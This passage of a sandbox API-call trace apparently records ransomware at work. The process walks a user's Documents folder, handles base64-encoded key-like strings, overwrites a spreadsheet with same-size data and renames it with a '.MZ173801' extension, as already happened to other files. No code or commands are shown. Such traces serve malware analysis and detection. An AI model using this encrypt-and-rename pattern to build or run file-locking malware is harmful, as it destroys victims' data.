lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d2ea20, ftCreationTime.dwHighDateTime=0x1d5f087, ftLastAccessTime.dwLowDateTime=0xc65aa60, ftLastAccessTime.dwHighDateTime=0x1d5e710, ftLastWriteTime.dwLowDateTime=0xaa1f26b3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="TrIgUDcr5i55m8wcE.xls.MZ173801", cAlternateFileName="TRIGUD~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1af85c0, ftCreationTime.dwHighDateTime=0x1d5e90b, ftLastAccessTime.dwLowDateTime=0xa0c8ebf0, ftLastAccessTime.dwHighDateTime=0x1d5e908, ftLastWriteTime.dwLowDateTime=0xaa1f26b3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc97a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="WH5hIeFaZD0Ye.pdf.MZ173801", cAlternateFileName="WH5HIE~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87f7df40, ftCreationTime.dwHighDateTime=0x1d5e382, ftLastAccessTime.dwLowDateTime=0x481bf920, ftLastAccessTime.dwHighDateTime=0x1d5ea25, ftLastWriteTime.dwLowDateTime=0xaa28aec6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9464, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="z0bDcRFEP75Y.xlsx.MZ173801", cAlternateFileName="Z0BDCR~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c00e0, ftCreationTime.dwHighDateTime=0x1d5e35b, ftLastAccessTime.dwLowDateTime=0x14f654b0, ftLastAccessTime.dwHighDateTime=0x1d5ec59, ftLastWriteTime.dwLowDateTime=0xaa2b10ed, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x143fc, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="_wpuiuTlUB.xlsx.MZ173801", cAlternateFileName="_WPUIU~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c00e0, ftCreationTime.dwHighDateTime=0x1d5e35b, ftLastAccessTime.dwLowDateTime=0x14f654b0, ftLastAccessTime.dwHighDateTime=0x1d5ec59, ftLastWriteTime.dwLowDateTime=0xaa2b10ed, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x143fc, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="_wpuiuTlUB.xlsx.MZ173801", cAlternateFileName="_WPUIU~1.MZ1")) returned 0 [0122.299] GetLastError () returned 0x12 [0122.299] FindClose (in: hFindFile=0xa1bb28 | out: hFindFile=0xa1bb28) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4ec030, ftCreationTime.dwHighDateTime=0x1d5e95b, ftLastAccessTime.dwLowDateTime=0x625f29e0, ftLastAccessTime.dwHighDateTime=0x1d5e5db, ftLastWriteTime.dwLowDateTime=0x625f29e0, ftLastWriteTime.dwHighDateTime=0x1d5e5db, nFileSizeHigh=0x0, nFileSizeLow=0xabaa, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="E5xn1.ots", cAlternateFileName="")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d338120, ftCreationTime.dwHighDateTime=0x1d5ee42, ftLastAccessTime.dwLowDateTime=0x175d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5ea1e, ftLastWriteTime.dwLowDateTime=0xaa00274d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17e1a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="KL4cEqDQZvlWYISl9.docx.MZ173801", cAlternateFileName="KL4CEQ~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07b45b0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x1f7cb140, ftLastAccessTime.dwHighDateTime=0x1d5e62d, ftLastWriteTime.dwLowDateTime=0xaa0289c2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa1b, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="MRdmd02KMM5JtOIVQ.docx.MZ173801", cAlternateFileName="MRDMD0~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89952490, ftCreationTime.dwHighDateTime=0x1d5ee43, ftLastAccessTime.dwLowDateTime=0x89a91900, ftLastAccessTime.dwHighDateTime=0x1d5ee07, ftLastWriteTime.dwLowDateTime=0xaa0289c2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x13912, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="pcZF9GerhzqY0.xls.MZ173801", cAlternateFileName="PCZF9G~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b96be0, ftCreationTime.dwHighDateTime=0x1d5e4bf, ftLastAccessTime.dwLowDateTime=0xcedf1100, ftLastAccessTime.dwHighDateTime=0x1d5e8f3, ftLastWriteTime.dwLowDateTime=0xaa0e7945, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16454, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="r_vOYVV008qvPgkFp.pps.MZ173801", cAlternateFileName="R_VOYV~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cb4660, ftCreationTime.dwHighDateTime=0x1d5e5e9, ftLastAccessTime.dwLowDateTime=0x976a7bd0, ftLastAccessTime.dwHighDateTime=0x1d5e919, ftLastWriteTime.dwLowDateTime=0xaa0e7945, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x13751, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="T1F3rLNHQkV.pps.MZ173801", cAlternateFileName="T1F3RL~1.MZ1")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.299] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WjAE", cAlternateFileName="")) returned 1 [0122.299] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.299] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bc08 [0122.300] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0122.300] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff39a30, ftCreationTime.dwHighDateTime=0x1d5ed79, ftLastAccessTime.dwLowDateTime=0x83d4a70, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x83d4a70, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x9bc7, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="43I3.xls", cAlternateFileName="")) returned 1 [0122.300] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0122.300] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.300] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\43I3.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\43i3.xls"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff39a30, ftCreationTime.dwHighDateTime=0x1d5ed79, ftLastAccessTime.dwLowDateTime=0x83d4a70, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x83d4a70, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x9bc7)) returned 1 [0122.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] GetCurrentThreadId () returned 0x1358 [0122.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\43I3.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\43i3.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.301] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.302] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.302] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x9bc7 [0122.302] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.302] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9bc7, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x9bc7, lpOverlapped=0x0) returned 1 [0122.303] CloseHandle (hObject=0x408) returned 1 [0122.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\43I3.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\43i3.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.305] WriteFile (in: hFile=0x408, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9bc7, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f424*=0x9bc7, lpOverlapped=0x0) returned 1 [0122.306] CloseHandle (hObject=0x408) returned 1 [0122.306] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\43I3.xls" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\43i3.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\43I3.xls.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\43i3.xls.mz173801")) returned 1 [0122.307] GetCurrentThreadId () returned 0x1358 [0122.307] GetCurrentThreadId () returned 0x1358 [0122.307] GetCurrentThreadId () returned 0x1358 [0122.307] 